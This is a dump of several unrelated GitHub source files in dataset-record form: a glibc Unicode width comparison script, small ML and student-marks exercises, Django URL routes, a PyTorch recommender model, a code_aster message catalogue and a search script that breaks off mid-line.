print('------------------------------------------------------------')\n    print('Total removed characters in newly generated WIDTH: %d'\n          %len(set(owidth)-set(nwidth)))\n    print('(Characters not in WIDTH get width 1 by default, '\n          + 'i.e. 
these have width 1 now.)')\n if ARGS.show_missing_characters:\n for key in sorted(set(owidth)-set(nwidth)):\n print('removed: {:s} '.format(ucs_symbol(key))\n + '{:d} : '.format(owidth[key])\n + 'eaw={:s} '.format(\n EAST_ASIAN_WIDTHS[key]\n if key in EAST_ASIAN_WIDTHS else None)\n + 'category={:2s} '.format(\n UNICODE_ATTRIBUTES[key]['category']\n if key in UNICODE_ATTRIBUTES else None)\n + 'bidi={:3s} '.format(\n UNICODE_ATTRIBUTES[key]['bidi']\n if key in UNICODE_ATTRIBUTES else None)\n + 'name={:s}'.format(\n UNICODE_ATTRIBUTES[key]['name']\n if key in UNICODE_ATTRIBUTES else None))\n print('------------------------------------------------------------')\n changed_width = {}\n for key in set(owidth).intersection(set(nwidth)):\n if owidth[key] != nwidth[key]:\n changed_width[key] = (owidth[key], nwidth[key])\n print('Total changed characters in newly generated WIDTH: %d'\n %len(changed_width))\n if ARGS.show_changed_characters:\n for key in sorted(changed_width):\n print('changed width: {:s} '.format(ucs_symbol(key))\n + '{:d}->{:d} : '.format(changed_width[key][0],\n changed_width[key][1])\n + 'eaw={:s} '.format(\n EAST_ASIAN_WIDTHS[key]\n if key in EAST_ASIAN_WIDTHS else None)\n + 'category={:2s} '.format(\n UNICODE_ATTRIBUTES[key]['category']\n if key in UNICODE_ATTRIBUTES else None)\n + 'bidi={:3s} '.format(\n UNICODE_ATTRIBUTES[key]['bidi']\n if key in UNICODE_ATTRIBUTES else None)\n + 'name={:s}'.format(\n UNICODE_ATTRIBUTES[key]['name']\n if key in UNICODE_ATTRIBUTES else None))\n print('------------------------------------------------------------')\n print('Total added characters in newly generated WIDTH: %d'\n %len(set(nwidth)-set(owidth)))\n print('(Characters not in WIDTH get width 1 by default, '\n + 'i.e. these had width 1 before.)')\n if ARGS.show_added_characters:\n for key in sorted(set(nwidth)-set(owidth)):\n print('added: {:s} '.format(ucs_symbol(key))\n + '{:d} : '.format(nwidth[key])\n + 'eaw={:s} '.format(\n EAST_ASIAN_WIDTHS[key]\n if key in EAST_ASIAN_WIDTHS else None)\n + 'category={:2s} '.format(\n UNICODE_ATTRIBUTES[key]['category']\n if key in UNICODE_ATTRIBUTES else None)\n + 'bidi={:3s} '.format(\n UNICODE_ATTRIBUTES[key]['bidi']\n if key in UNICODE_ATTRIBUTES else None)\n + 'name={:s}'.format(\n UNICODE_ATTRIBUTES[key]['name']\n if key in UNICODE_ATTRIBUTES else None))\n\nif __name__ == \"__main__\":\n PARSER = argparse.ArgumentParser(\n description='''\n Compare the contents of LC_CTYPE in two files and check for errors.\n ''')\n PARSER.add_argument(\n '-o', '--old_utf8_file',\n nargs='?',\n required=True,\n type=str,\n help='The old UTF-8 file.')\n PARSER.add_argument(\n '-n', '--new_utf8_file',\n nargs='?',\n required=True,\n type=str,\n help='The new UTF-8 file.')\n PARSER.add_argument(\n '-u', '--unicode_data_file',\n nargs='?',\n type=str,\n help='The UnicodeData.txt file to read.')\n PARSER.add_argument(\n '-e', '--east_asian_width_file',\n nargs='?',\n type=str,\n help='The EastAsianWidth.txt file to read.')\n PARSER.add_argument(\n '-a', '--show_added_characters',\n action='store_true',\n help='Show characters which were added in detail.')\n PARSER.add_argument(\n '-m', '--show_missing_characters',\n action='store_true',\n help='Show characters which were removed in detail.')\n PARSER.add_argument(\n '-c', '--show_changed_characters',\n action='store_true',\n help='Show characters whose width was changed in detail.')\n ARGS = PARSER.parse_args()\n\n if ARGS.unicode_data_file:\n fill_attributes(ARGS.unicode_data_file)\n if 
ARGS.east_asian_width_file:\n fill_east_asian_widths(ARGS.east_asian_width_file)\n check_charmap(ARGS.old_utf8_file, ARGS.new_utf8_file)\n check_width(ARGS.old_utf8_file, ARGS.new_utf8_file)\n","repo_name":"lockedbyte/glibc_sources","sub_path":"glibc_2.22/localedata/unicode-gen/utf8_compatibility.py","file_name":"utf8_compatibility.py","file_ext":"py","file_size_in_byte":14905,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"19929423642","text":"import pandas as pd\nimport numpy as np\n\ndata=pd.read_csv('2.csv')\nrows=data.shape[0]\ncols=data.shape[1]-1\nconcepts = np.array(data.iloc[:,0:-1])\ntarget = np.array(data.iloc[:,-1])\nspec_h=list()\nfor i in range(rows):\n if data.iloc[i,cols]=='Yes':\n for j in data.iloc[i]:\n spec_h.append(j)\n break\nspec_h.pop()\ngen_h = [[\"?\" for i in range(cols)] for i in range(cols)]\nfor i, h in enumerate(concepts):\n if target[i] == \"Yes\":\n for x in range(cols):\n if h[x] != spec_h[x]:\n spec_h[x] = '?'\n gen_h[x][x] = '?'\n if target[i] == \"No\":\n for x in range(cols):\n if h[x] != spec_h[x]:\n gen_h[x][x] = spec_h[x]\n else:\n gen_h[x][x] = '?'\nindices = [i for i, val in enumerate(gen_h) if val == ['?', '?', '?', '?', '?', '?']]\nfor i in indices:\n gen_h.remove(['?', '?', '?', '?', '?', '?'])\nprint(\"Final Specific_h:\", spec_h, sep=\"\\n\")\nprint(\"Final General_h:\", gen_h, sep=\"\\n\")","repo_name":"raghuachar12/ML-LAB-","sub_path":"lab prg ml/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6475749288","text":"print('Enter number of students')\r\nnum=input()\r\nnum=int(num)\r\n\r\nstudents=[dict() for x in range(num)]\r\n\r\nfor i in range(num):\r\n print('Enter name')\r\n nam=input()\r\n students[i]['Name']=nam\r\n print('Enter Roll n.o')\r\n rno=int(input())\r\n students[i]['RollNo']=rno\r\n print('Enter Marks as a list')\r\n temp = input()\r\n Mrk=[]\r\n for k in range(len(temp)):\r\n if(temp[k]=='[' or temp[k]==']' or temp[k]==','):\r\n continue\r\n else:\r\n Mrk.append(temp[k])\r\n for j in range(len(Mrk)):\r\n Mrk[j]=int(Mrk[j])\r\n students[i]['Marks']=Mrk\r\n \r\nprint(\"\\nmenu\\na)Details of all the students\\nb)sum of all marks in descending order\\nc)student with maximum mark\")\r\nprint(\"d)student with minimum mark\\ne)student who is having average mark\\nf)exit\") \r\n\r\noption='z'\r\nwhile option!='f':\r\n option=input(\"\\nEnter the option\\n\")\r\n if(option=='a'):\r\n for i in range(num):\r\n print(\"Name:\",students[i]['Name'])\r\n print(\"Roll number:\",students[i]['RollNo'])\r\n print(\"Marks:\",end='')\r\n print(*students[i]['Marks'],sep=',')\r\n \r\n elif(option=='b'):\r\n summark=[]\r\n for i in range(num):\r\n summark.append(sum(students[i]['Marks']))\r\n summark.sort(reverse=True)\r\n print(*summark,sep=',')\r\n \r\n elif(option=='c'):\r\n summark=[]\r\n for i in range(num):\r\n summark.append(sum(students[i]['Marks']))\r\n \r\n for i in range(num):\r\n if(summark[i]==max(summark)):\r\n print(\"student name:\",students[i]['Name'])\r\n print(\"mark:\",summark[i])\r\n break;\r\n \r\n elif(option=='d'): \r\n summark=[]\r\n for i in range(num):\r\n summark.append(sum(students[i]['Marks']))\r\n \r\n for i in range(num):\r\n if(summark[i]==min(summark)):\r\n print(\"student name:\",students[i]['Name'])\r\n print(\"mark:\",summark[i])\r\n break; \r\n \r\n elif(option=='e'): \r\n summark=[]\r\n for i in range(num):\r\n 
summark.append(sum(students[i]['Marks']))\r\n            \r\n        for i in range(num):\r\n            if(summark[i]==sum(summark)/num):\r\n                print(\"student name:\",students[i]['Name'])\r\n                print(\"mark:\",summark[i])\r\n                break;\r\n        else:\r\n            print(\"student name:no student\")\r\n        \r\n    else:\r\n        break;\r\n    \r\n# CREDIT : https://github.com/adhi85/\r\n","repo_name":"adhi85/Student-Marking-System","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"71422238954","text":"from django.contrib.auth import views as auth_views\nfrom django.urls import path, include\n\nfrom .views import *\n\napp_name = \"Users\"\n\nurlpatterns = [\n    path(\"\", dashboard, name=\"dashboard\"),\n    path('accounts/', include('django.contrib.auth.urls')),\n    path(\"profile_list/\", profile_list, name=\"profile_list\"),\n    path(\"profile/\", profile, name=\"profile\"),\n    path('login/', auth_views.LoginView.as_view(template_name='registration/login.html'), name='login'),\n    path('logout/', auth_views.LogoutView.as_view(template_name='registration/logout.html'), name='logout'),\n\n    path('register/', register, name='register'),\n    path('add_poems/', add_poems, name='add_poems'),\n    #path('edit_poems/', edit_poems, name='edit_poems'),\n    path('read_poems/', read_poems, name='read_poems'),\n    path('my_account/', profile_view, name='my_account'),\n]\n","repo_name":"Nico3125/Poiesis_blog","sub_path":"Users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"5812346778","text":"# -*- coding: utf-8 -*-\r\nimport torch\r\nfrom torch.optim import Adam\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.nn.functional import softmax\r\nimport numpy as np\r\nimport sys\r\nfrom DataSet import DataSetTrain, DataSetTestNext, DataSetTestNextNew\r\n\r\nimport logging\r\n\r\nFType = torch.FloatTensor\r\nLType = torch.LongTensor\r\n\r\nFORMAT = \"%(asctime)s - %(message)s\"\r\nlogging.basicConfig(level=logging.INFO, format=FORMAT)\r\n\r\nNORM_METHOD = 'hour'\r\n\r\n\r\nclass HTSER_a:\r\n    def __init__(self, file_path_tr, file_path_te_old, file_path_te_new, emb_size=128, neg_size=10,\r\n                 hist_len=2,\r\n                 user_count=992, item_count=5000, directed=True, learning_rate=0.001, decay=0.001, batch_size=1024,\r\n                 test_and_save_step=50, epoch_num=100, top_n=30, sample_time=3, sample_size=100,\r\n                 use_hist_attention=True, use_user_pref_attention=True, num_workers=0):\r\n        self.emb_size = emb_size\r\n        self.neg_size = neg_size\r\n        self.hist_len = hist_len\r\n\r\n        self.user_count = user_count\r\n        self.item_count = item_count\r\n\r\n        self.lr = learning_rate\r\n        self.decay = decay\r\n        self.batch = batch_size\r\n        self.test_and_save_step = test_and_save_step\r\n        self.epochs = epoch_num\r\n\r\n        self.top_n = top_n\r\n        self.sample_time = sample_time\r\n        self.sample_size = sample_size\r\n\r\n        self.directed = directed\r\n        self.use_hist_attention = use_hist_attention\r\n        self.use_user_pref_attention = use_user_pref_attention\r\n\r\n        self.num_workers = num_workers\r\n\r\n        self.temp_value1 = 0.0\r\n        self.temp_value2 = 0.0\r\n\r\n        logging.info('emb_size: {}'.format(emb_size))\r\n        logging.info('neg_size: {}'.format(neg_size))\r\n        logging.info('hist_len: {}'.format(hist_len))\r\n        logging.info('user_count: {}'.format(user_count))\r\n        logging.info('item_count: 
{}'.format(item_count))\r\n logging.info('lr: {}'.format(learning_rate))\r\n logging.info('epoch_num: {}'.format(epoch_num))\r\n logging.info('test_and_save_step: {}'.format(test_and_save_step))\r\n logging.info('batch: {}'.format(batch_size))\r\n logging.info('top_n: {}'.format(top_n))\r\n logging.info('sample_time: {}'.format(sample_time))\r\n logging.info('sample_size: {}'.format(sample_size))\r\n logging.info('directed: {}'.format(directed))\r\n logging.info('use_hist_attention: {}'.format(use_hist_attention))\r\n logging.info('use_user_pref_attention: {}'.format(use_user_pref_attention))\r\n\r\n self.data_tr = DataSetTrain(file_path_tr, user_count=self.user_count, item_count=self.item_count,\r\n neg_size=self.neg_size, hist_len=self.hist_len, directed=self.directed)\r\n self.data_te_old = DataSetTestNext(file_path_te_old, user_count=self.user_count, item_count=self.item_count,\r\n hist_len=self.hist_len, user_item_dict=self.data_tr.user_item_dict,\r\n directed=self.directed)\r\n self.data_te_new = DataSetTestNextNew(file_path_te_new, user_count=self.user_count, item_count=self.item_count,\r\n hist_len=self.hist_len, user_item_dict=self.data_tr.user_item_dict,\r\n directed=self.directed)\r\n\r\n self.node_dim = self.data_tr.get_node_dim()\r\n self.node_emb = torch.tensor(\r\n np.random.uniform(-0.5 / self.emb_size, 0.5 / self.emb_size, size=(self.node_dim, self.emb_size)),\r\n dtype=torch.float)\r\n self.delta = torch.ones(self.node_dim, dtype=torch.float)\r\n self.weight = torch.tensor(\r\n np.random.normal(0, np.sqrt(2.0 / self.emb_size), size=(self.emb_size, self.emb_size)), dtype=torch.float)\r\n self.bias = torch.tensor(\r\n np.random.normal(0, np.sqrt(2.0 / self.emb_size), size=self.emb_size), dtype=torch.float)\r\n\r\n self.long_short_pref_weight = torch.tensor(\r\n np.random.normal(0, np.sqrt(2.0 / self.emb_size), size=(2*self.emb_size, 2)),\r\n dtype=torch.float)\r\n self.long_short_pref_bias = torch.tensor(np.random.normal(0, np.sqrt(2.0 / self.emb_size), size=2),\r\n dtype=torch.float)\r\n\r\n if torch.cuda.is_available():\r\n self.node_emb = self.node_emb.cuda()\r\n self.delta = self.delta.cuda()\r\n self.weight = self.weight.cuda()\r\n self.bias = self.bias.cuda()\r\n self.long_short_pref_weight = self.long_short_pref_weight.cuda()\r\n self.long_short_pref_bias = self.long_short_pref_bias.cuda()\r\n self.node_emb.requires_grad = True\r\n self.delta.requires_grad = True\r\n self.weight.requires_grad = True\r\n self.bias.requires_grad = True\r\n self.long_short_pref_weight.requires_grad = True\r\n self.long_short_pref_bias.requires_grad = True\r\n self.opt = Adam(lr=self.lr,\r\n params=[self.node_emb, self.delta, self.weight, self.bias, self.long_short_pref_weight,\r\n self.long_short_pref_bias], weight_decay=self.decay)\r\n self.loss = torch.FloatTensor()\r\n\r\n def forward(self, s_nodes, t_nodes, t_times, n_nodes, h_nodes, h_times, h_time_mask):\r\n batch = s_nodes.size()[0]\r\n s_node_emb = torch.index_select(self.node_emb, 0, s_nodes.view(-1)).view(batch, -1)\r\n t_node_emb = torch.index_select(self.node_emb, 0, t_nodes.view(-1)).view(batch, -1)\r\n h_node_emb = torch.index_select(self.node_emb, 0, h_nodes.view(-1)).view(batch, self.hist_len, -1)\r\n hidden_h_node_emb = torch.relu(torch.matmul(h_node_emb, self.weight) + self.bias)\r\n attention = softmax((torch.mul(s_node_emb.unsqueeze(1), hidden_h_node_emb).sum(dim=2)), dim=1)\r\n p_mu = torch.mul(s_node_emb, t_node_emb).sum(dim=1)\r\n p_alpha = torch.mul(h_node_emb, t_node_emb.unsqueeze(1)).sum(dim=2)\r\n 
self.temp_array1 += p_alpha.mean(dim=0).data.cpu().numpy()\r\n\r\n self.delta.data.clamp_(min=1e-6)\r\n delta = torch.index_select(self.delta, 0, s_nodes.view(-1)).unsqueeze(1)\r\n d_time = torch.abs(t_times.unsqueeze(1) - h_times)\r\n\r\n d_time.data.clamp_(min=1e-6)\r\n\r\n if self.use_user_pref_attention:\r\n long_short_embedding = torch.cat([s_node_emb, torch.mean(h_node_emb, dim=1)], dim=1)\r\n pref_hidden = torch.softmax(torch.relu(\r\n torch.matmul(long_short_embedding, self.long_short_pref_weight) + self.long_short_pref_bias), dim=1)\r\n self.temp_value3 += pref_hidden[:, 0].mean().data\r\n self.temp_value4 += pref_hidden[:, 1].mean().data\r\n\r\n long_pref_weight = pref_hidden[:, 0]\r\n short_pref_weight = pref_hidden[:, 1]\r\n else:\r\n long_pref_weight = torch.zeros(batch, dtype=torch.float) + 0.5\r\n short_pref_weight = torch.zeros(batch, dtype=torch.float) + 0.5\r\n if torch.cuda.is_available():\r\n long_pref_weight = long_pref_weight.cuda()\r\n short_pref_weight = short_pref_weight.cuda()\r\n self.temp_value1 += long_pref_weight.mean().data\r\n self.temp_value2 += short_pref_weight.mean().data\r\n\r\n if self.use_hist_attention:\r\n p_lambda = long_pref_weight * p_mu + short_pref_weight * (\r\n attention * p_alpha * torch.exp(torch.neg(delta) * d_time) * h_time_mask).sum(dim=1)\r\n\r\n else:\r\n p_lambda = long_pref_weight * p_mu + short_pref_weight * (\r\n p_alpha * torch.exp(torch.neg(delta) * d_time) * h_time_mask).sum(dim=1)\r\n n_node_emb = torch.index_select(self.node_emb, 0, n_nodes.view(-1)).view(batch, self.neg_size, -1)\r\n n_mu = torch.mul(s_node_emb.unsqueeze(1), n_node_emb).sum(dim=2)\r\n n_alpha = torch.mul(h_node_emb.unsqueeze(2), n_node_emb.unsqueeze(1)).sum(dim=3)\r\n long_pref_weight = long_pref_weight.unsqueeze(1)\r\n short_pref_weight = short_pref_weight.unsqueeze(1)\r\n if self.use_hist_attention:\r\n n_lambda = long_pref_weight.detach() * n_mu + short_pref_weight.detach() * (\r\n attention.detach().unsqueeze(2) * n_alpha * (torch.exp(torch.neg(delta) * d_time).unsqueeze(2)) * (\r\n h_time_mask.unsqueeze(2))).sum(dim=1)\r\n else:\r\n n_lambda = long_pref_weight.detach() * n_mu + short_pref_weight.detach() * (\r\n n_alpha * (torch.exp(torch.neg(delta) * d_time).unsqueeze(2)) * (\r\n h_time_mask.unsqueeze(2))).sum(dim=1)\r\n\r\n self.temp_value5 += p_mu.mean().data\r\n self.temp_value6 += n_mu.mean().data\r\n return p_lambda, n_lambda\r\n\r\n def loss_func(self, s_nodes, t_nodes, t_times, n_nodes, h_nodes, h_times, h_time_mask):\r\n p_lambdas, n_lambdas = self.forward(s_nodes, t_nodes, t_times, n_nodes, h_nodes, h_times, h_time_mask)\r\n loss = -torch.log(torch.sigmoid(p_lambdas.unsqueeze(1)-n_lambdas)).sum(dim=1)\r\n return loss\r\n\r\n def update(self, s_nodes, t_nodes, t_times, n_nodes, h_nodes, h_times, h_time_mask):\r\n self.opt.zero_grad()\r\n loss = self.loss_func(s_nodes, t_nodes, t_times, n_nodes, h_nodes, h_times, h_time_mask)\r\n loss = loss.sum()\r\n self.loss += loss.data\r\n loss.backward()\r\n self.opt.step()\r\n\r\n def train(self):\r\n self.epoch_temp = 0\r\n for epoch in range(self.epochs):\r\n self.epoch_temp = epoch\r\n self.temp_value1 = 0.0\r\n self.temp_value2 = 0.0\r\n self.temp_value3 = 0.0\r\n self.temp_value4 = 0.0\r\n self.temp_value5 = 0.0\r\n self.temp_value6 = 0.0\r\n self.temp_array1 = np.zeros(self.hist_len)\r\n self.loss = 0.0\r\n\r\n loader = DataLoader(self.data_tr, batch_size=self.batch, shuffle=True, num_workers=self.num_workers)\r\n for i_batch, sample_batched in enumerate(loader):\r\n\r\n if 
torch.cuda.is_available():\r\n self.update(sample_batched['source_node'].type(LType).cuda(),\r\n sample_batched['target_node'].type(LType).cuda(),\r\n sample_batched['target_time'].type(FType).cuda(),\r\n sample_batched['neg_nodes'].type(LType).cuda(),\r\n sample_batched['history_nodes'].type(LType).cuda(),\r\n sample_batched['history_times'].type(FType).cuda(),\r\n sample_batched['history_masks'].type(FType).cuda())\r\n else:\r\n self.update(sample_batched['source_node'].type(LType),\r\n sample_batched['target_node'].type(LType),\r\n sample_batched['target_time'].type(FType),\r\n sample_batched['neg_nodes'].type(LType),\r\n sample_batched['history_nodes'].type(LType),\r\n sample_batched['history_times'].type(FType),\r\n sample_batched['history_masks'].type(FType))\r\n\r\n sys.stdout.write('\\repoch ' + str(epoch) + ': avg loss = ' +\r\n str(self.loss.cpu().numpy() / len(self.data_tr)) + '\\n')\r\n sys.stdout.flush()\r\n if ((epoch + 1) % self.test_and_save_step == 0) or epoch == 0 or epoch == 4 or epoch == 9:\r\n self.recommend(epoch, is_new_item=False)\r\n self.recommend(epoch, is_new_item=True)\r\n print(\"long_pref_weight.mean(): {}\".format(self.temp_value1 / i_batch))\r\n print(\"short_pref_weight.mean(): {}\".format(self.temp_value2 / i_batch))\r\n print(\"long_pref_hidden.mean(): {}\".format(self.temp_value3 / i_batch))\r\n print(\"short_pref_hidden.mean(): {}\".format(self.temp_value4 / i_batch))\r\n print(\"alpha.mean(): {}\".format(self.temp_array1 / i_batch))\r\n print(\"p_mu.mean(): {}\".format(self.temp_value5 / i_batch))\r\n print(\"n_mu.mean(): {}\".format(self.temp_value6 / i_batch))\r\n print(\"==========================\")\r\n\r\n def recommend(self, epoch, is_new_item=False):\r\n count_all = 0\r\n rate_all_sum = 0\r\n recall_all_sum = np.zeros(self.top_n)\r\n MRR_all_sum = np.zeros(self.top_n)\r\n\r\n if is_new_item:\r\n loader = DataLoader(self.data_te_new, batch_size=self.batch, shuffle=False, num_workers=self.num_workers)\r\n else:\r\n loader = DataLoader(self.data_te_old, batch_size=self.batch, shuffle=False, num_workers=self.num_workers)\r\n for i_batch, sample_batched in enumerate(loader):\r\n if torch.cuda.is_available():\r\n rate_all, recall_all, MRR_all = \\\r\n self.evaluate(sample_batched['source_node'].type(LType).cuda(),\r\n sample_batched['target_node'].type(LType).cuda(),\r\n sample_batched['target_time'].type(FType).cuda(),\r\n sample_batched['history_nodes'].type(LType).cuda(),\r\n sample_batched['history_times'].type(FType).cuda(),\r\n sample_batched['history_masks'].type(FType).cuda())\r\n else:\r\n rate_all, recall_all, MRR_all = \\\r\n self.evaluate(sample_batched['source_node'].type(LType),\r\n sample_batched['target_node'].type(LType),\r\n sample_batched['target_time'].type(FType),\r\n sample_batched['history_nodes'].type(LType),\r\n sample_batched['history_times'].type(FType),\r\n sample_batched['history_masks'].type(FType))\r\n count_all += self.batch\r\n rate_all_sum += rate_all\r\n recall_all_sum += recall_all\r\n MRR_all_sum += MRR_all\r\n\r\n rate_all_sum_avg = rate_all_sum * 1. / count_all\r\n recall_all_avg = recall_all_sum * 1. / count_all\r\n MRR_all_avg = MRR_all_sum * 1. 
/ count_all\r\n if is_new_item:\r\n logging.info('=========== testing next new item epoch: {} ==========='.format(epoch))\r\n logging.info('count_all_next_new: {}'.format(count_all))\r\n logging.info('rate_all_sum_avg_next_new: {}'.format(rate_all_sum_avg))\r\n logging.info('recall_all_avg_next_new: {}'.format(recall_all_avg))\r\n logging.info('MRR_all_avg_next_new: {}'.format(MRR_all_avg))\r\n else:\r\n logging.info('~~~~~~~~~~~~~ testing next item epoch: {} ~~~~~~~~~~~~~'.format(epoch))\r\n logging.info('count_all_next: {}'.format(count_all))\r\n logging.info('rate_all_sum_avg_next: {}'.format(rate_all_sum_avg))\r\n logging.info('recall_all_avg_next: {}'.format(recall_all_avg))\r\n logging.info('MRR_all_avg_next: {}'.format(MRR_all_avg))\r\n\r\n def evaluate(self, s_nodes, t_nodes, t_times, h_nodes, h_times, h_time_mask):\r\n batch = s_nodes.size()[0]\r\n all_item_index = torch.arange(0, self.item_count)\r\n if torch.cuda.is_available():\r\n all_item_index = all_item_index.cuda()\r\n all_node_emb = torch.index_select(self.node_emb, 0, all_item_index).detach()\r\n\r\n h_node_emb = torch.index_select(self.node_emb, 0, h_nodes.view(-1)).detach().view(batch, self.hist_len, -1)\r\n p_alpha = torch.matmul(h_node_emb, torch.transpose(all_node_emb, 0, 1))\r\n\r\n self.delta.data.clamp_(min=1e-6)\r\n\r\n d_time = torch.abs(t_times.unsqueeze(1) - h_times)\r\n\r\n delta = torch.index_select(self.delta, 0, s_nodes.view(-1)).detach().unsqueeze(1)\r\n s_node_emb = torch.index_select(self.node_emb, 0, s_nodes.view(-1)).detach().view(batch, -1)\r\n\r\n hidden_h_node_emb = torch.relu(torch.matmul(h_node_emb, self.weight.detach()) + self.bias.detach())\r\n attention = softmax((torch.mul(s_node_emb.unsqueeze(1), hidden_h_node_emb).sum(dim=2)), dim=1)\r\n p_mu = torch.matmul(s_node_emb, torch.transpose(all_node_emb, 0, 1))\r\n if self.use_user_pref_attention:\r\n long_short_embedding = torch.cat([s_node_emb, torch.mean(h_node_emb, dim=1)], dim=1)\r\n pref_hidden = torch.softmax(torch.relu(\r\n torch.matmul(long_short_embedding,\r\n self.long_short_pref_weight.detach()) + self.long_short_pref_bias.detach()), dim=1)\r\n long_pref_weight = pref_hidden[:, 0]\r\n short_pref_weight = pref_hidden[:, 1]\r\n else:\r\n long_pref_weight = torch.zeros(batch, dtype=torch.float) + 0.5\r\n short_pref_weight = torch.zeros(batch, dtype=torch.float) + 0.5\r\n if torch.cuda.is_available():\r\n long_pref_weight = long_pref_weight.cuda()\r\n short_pref_weight = short_pref_weight.cuda()\r\n long_pref_weight = long_pref_weight.unsqueeze(1)\r\n short_pref_weight = short_pref_weight.unsqueeze(1)\r\n if self.use_hist_attention:\r\n p_lambda = long_pref_weight * p_mu + short_pref_weight * (\r\n p_alpha * (attention * torch.exp(torch.neg(delta) * d_time) * h_time_mask).unsqueeze(2)).sum(\r\n dim=1)\r\n else:\r\n p_lambda = long_pref_weight * p_mu + short_pref_weight * (\r\n p_alpha * (torch.exp(torch.neg(delta) * d_time) * h_time_mask).unsqueeze(2)).sum(dim=1)\r\n\r\n rate_all_sum = 0\r\n recall_all = np.zeros(self.top_n)\r\n MRR_all = np.zeros(self.top_n)\r\n\r\n t_nodes_list = t_nodes.cpu().numpy().tolist()\r\n p_lambda_numpy = p_lambda.cpu().numpy()\r\n for i in range(len(t_nodes_list)):\r\n t_node = t_nodes_list[i]\r\n p_lambda_numpy_i_item = p_lambda_numpy[i]\r\n prob_index = np.argsort(-p_lambda_numpy_i_item).tolist()\r\n gnd_rate = prob_index.index(t_node) + 1\r\n rate_all_sum += gnd_rate\r\n if gnd_rate <= self.top_n:\r\n recall_all[gnd_rate - 1:] += 1\r\n MRR_all[gnd_rate - 1:] += 1. 
/ gnd_rate\r\n        return rate_all_sum, recall_all, MRR_all\r\n\r\n    def save_parameter_value(self, path, parameter, data_type):\r\n        if torch.cuda.is_available():\r\n            parameter_cpu = parameter.cpu().data.numpy()\r\n        else:\r\n            parameter_cpu = parameter.data.numpy()\r\n        writer = open(path, 'w')\r\n        if data_type == \"vector\":\r\n            writer.write('%d\\n' % (parameter_cpu.shape[0]))\r\n            writer.write('\\t'.join(str(d) for d in parameter_cpu))\r\n        elif data_type == \"matrix\":\r\n            dim_0, dim_1 = parameter_cpu.shape\r\n            writer.write('%d\\t%d\\n' % (dim_0, dim_1))\r\n            for n_idx in range(dim_0):\r\n                writer.write('\\t'.join(str(d) for d in parameter_cpu[n_idx]) + '\\n')\r\n        else:\r\n            pass\r\n        writer.close()","repo_name":"dongjingWANG/MHPE_github","sub_path":"Model_new_user_attention3.py","file_name":"Model_new_user_attention3.py","file_ext":"py","file_size_in_byte":19057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"16778613287","text":"#\n# -*- coding:utf-8 -*-\n\nimport numpy as np\n\nfrom PIL import Image\n\n\n# Compute a**2 + b**3, where a and b are one-dimensional arrays\ndef pySum():\n    a = [0, 1, 2, 3, 4]\n    b = [9, 8, 7, 6, 5]\n    c = []\n    for i in range(len(a)):\n        c.append(a[i] ** 2 + b[i] ** 3)\n    return c\n\ndef npSum():\n    a = np.array([0, 1, 2, 3, 4])\n    b = np.array([9, 8, 7, 6, 5])\n\n    c = a**2 + b**3\n    return c\n\ndef show_image():\n    filepath = \"./shida.jpg\"\n    im1 = np.array(Image.open(filepath))\n    im2 = np.array(Image.open(filepath).convert(\"L\"))\n    print(im1.shape, im1.dtype)\n    # print(im2)\n    # save the grayscale image\n    im2 = Image.fromarray(im2)\n    im2.save(\"./shida-hui.jpg\")\n\n\nif __name__ == '__main__':\n    # print(pySum())\n    # print(npSum())\n    show_image()","repo_name":"xiaowu5759/datatrain","sub_path":"01-numpytrain.py","file_name":"01-numpytrain.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"20428477831","text":"from ..Utilities import _\n\ncata_msg = {\n    1: _(\n        \"\"\"\nL'unique occurrence de RITZ doit obligatoirement contenir MODE_MECA.\nSi BASE_MODALE est utilisée, il faut aussi donner les modes d'interface par MODE_INTF.\nEt si on veut MODE_INTF uniquement, il faut quand même ajouter une 2ème occurrence\nde RITZ avec MODE_MECA et NMAX_MODE mis à 0.\n\"\"\"\n    ),\n    2: _(\n        \"\"\"\nLa base modale est composée de vecteurs complexes. Pour la projection, seule leur partie réelle\nsera utilisée. \n\"\"\"\n    ),\n    9: _(\"\"\"Le mot-clé NUME_REF est obligatoire quand DEFI_BASE_MODALE n'est pas ré-entrant.\"\"\"),\n    31: _(\n        \"\"\"\nIl y a un problème de cohérence entre le nombre de concepts MODE_MECA et la liste\ndes NMAX_MODE:\n  Nombre de concepts MODE_MECA dans la liste MODE_MECA : %(i1)d\n  Nombre de valeurs de la liste NMAX_MODE : %(i2)d\n  Les deux listes doivent avoir la même taille.\n\"\"\"\n    ),\n    50: _(\"\"\"Le total des modes défini dans RITZ est nul. Il faut au moins un mode.\"\"\"),\n    51: _(\n        \"\"\"\nDeux occurrences de RITZ doivent obligatoirement et exactement contenir une fois\nle mot-clé MODE_INTF. 
Les autres possibilités ne sont pas autorisées.\n\"\"\"\n ),\n}\n","repo_name":"Krande/code-aster-copy","sub_path":"code_aster/Messages/defibasemodale1.py","file_name":"defibasemodale1.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15237052209","text":"#!/usr/bin/python\n\nimport sys\n\nzipcodes=[]\nflights={}\n\ndef solve(path,avail):\n #Try to solve the problem given that we have started with the given path\n #and avail indicates whether we can fly outbound from each city in that path\n if len(path)==len(zipcodes):\n return path\n #Compute list of unvisited cities we can reach and sort by zip code\n reachable=[]\n for j in xrange(len(path)):\n if avail[j]:\n for flight in flights[path[j]]:\n if flight not in path and flight not in reachable:\n reachable.append((zipcodes[flight-1],flight))\n reachable.sort()\n #For each reachable city, figure out how far back in our path we have to\n #return to get to it, and go there, until we find a solution\n for zip,city in reachable:\n navail=avail[:]\n for j in 